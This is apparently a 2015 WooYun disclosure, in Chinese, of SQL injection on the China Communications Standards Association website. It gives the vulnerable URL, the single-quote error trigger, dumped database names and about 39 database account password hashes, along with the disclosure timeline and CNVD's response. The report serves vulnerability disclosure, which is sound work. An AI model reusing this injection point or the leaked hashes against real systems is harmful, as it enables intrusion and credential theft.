当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126862

漏洞标题:中国通信标准化协会主站sql注入

相关厂商:中国通信标准化协会

漏洞作者: MT哥

提交时间:2015-07-15 12:52

修复时间:2015-08-31 16:04

公开时间:2015-08-31 16:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开

简要描述:

注入 注入 注出水

详细说明:

http://www.ccsa.org.cn/showgn.php3?source=yd&id=4550


随便加个单引号 出错~~ ~.~

漏洞证明:

available databases [44]:
[*] article
[*] auth
[*] ccsa_access_log
[*] ccsadoc
[*] client_update
[*] customer
[*] del_mladvert
[*] del_ptpic
[*] del_pw_log
[*] del_style
[*] del_test
[*] del_tmparticle
[*] doc
[*] fileopen
[*] ftpusers
[*] good_member
[*] gsc15
[*] information_schema
[*] IOofCOM
[*] jiaoliu
[*] log
[*] logs
[*] lost+found
[*] maintain
[*] meeting
[*] ml4ccsa
[*] ml4ptsn
[*] mnogosearch
[*] mysql
[*] phpmyadmin
[*] prod
[*] prodex
[*] questionnaire
[*] sales
[*] shenbao
[*] std
[*] std_temp
[*] stdcd
[*] tc485
[*] test
[*] tlc
[*] tspc
[*] userstd
[*] vpopmail


database management system users password hashes:
[*] auth_rd [1]:
    password hash: 38755f107acb1b50
[*] auth_rw [1]:
    password hash: 6c90aa2604862b9b
[*] backup [1]:
    password hash: 0af4727b4f928228
[*] ccsa_rd [1]:
    password hash: 6ec627e402484936
[*] ccsa_rw [1]:
    password hash: 1c9c80061d48e945
[*] doc_rd [1]:
    password hash: 362f29946e86ae30
[*] doc_rw [1]:
    password hash: 57cf2b7f207cc98c
[*] ftp [1]:
    password hash: 694bf0e84e1746b6
[*] infosrv [1]:
    password hash: 0107187807836006
[*] log_rd [1]:
    password hash: 773359240eb9a1d9
[*] log_rw [1]:
    password hash: 1f1d533a5b0f5247
[*] mailuser [1]:
    password hash: 0206b55f23e2e967
[*] maint_rw [1]:
    password hash: 06988dd331f93204
[*] mepadmin [1]:
    password hash: 13f162af21797902
[*] minfosrv [1]:
    password hash: 6fc780f149d98015
[*] mlog [1]:
    password hash: 32099b90045157c1
[*] mproduct [1]:
    password hash: 4b31b6b72a2ffa73
[*] mptpic [1]:
    password hash: 7f38034b3972ae37
[*] mptqc [1]:
    password hash: 7363df490bd6e5ee
[*] mptsn_auth [1]:
    password hash: 300582b60d0ce39f
[*] prod_rd [1]:
    password hash: 7ac54f89754e39ab
[*] prod_rw [1]:
    password hash: 3d4faebb32aedf8c
[*] ptpic [1]:
    password hash: 58eba2fc22d22204
[*] ptpic_rd [1]:
    password hash: 12e8cd2f1c97b82d
[*] ptpic_rw [1]:
    password hash: 6f8c7ba26dfd93fe
[*] ptqc [1]:
    password hash: 67c4ea1842a027a1
[*] ptqc_rd [1]:
    password hash: 326fd13f1db64eba
[*] ptqc_rw [1]:
    password hash: 472c940019929961
[*] ptsn_auth [1]:
    password hash: 5bd622e73f6459c9
[*] readall [1]:
    password hash: 34bba4f421608fb9
[*] root [1]:
    password hash: 5b85aec77f441075
[*] shouli [1]:
    password hash: 32a437f543402d9c
[*] shouli_rd [1]:
    password hash: 408efbf60d3c8899
[*] shouli_rw [1]:
    password hash: 0bbe89a47b7e9f94
[*] std_rd [1]:
    password hash: 57aec995239e6fc7
[*] std_rw [1]:
    password hash: 0c979a9e1a1a7df0
[*] tlcadmin [1]:
    password hash: 0c979a9e1a1a7df0
[*] tlcwebuser [1]:
    password hash: 14780cf32b1ea347
[*] userstd_rw [1]:
    password hash: 6360f4a4380593b6
[*] vpopmail [1]:
    password hash: 654925394d80d5e4


修复方案:

waf+过滤

版权声明:转载请注明来源 MT哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-17 16:04

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无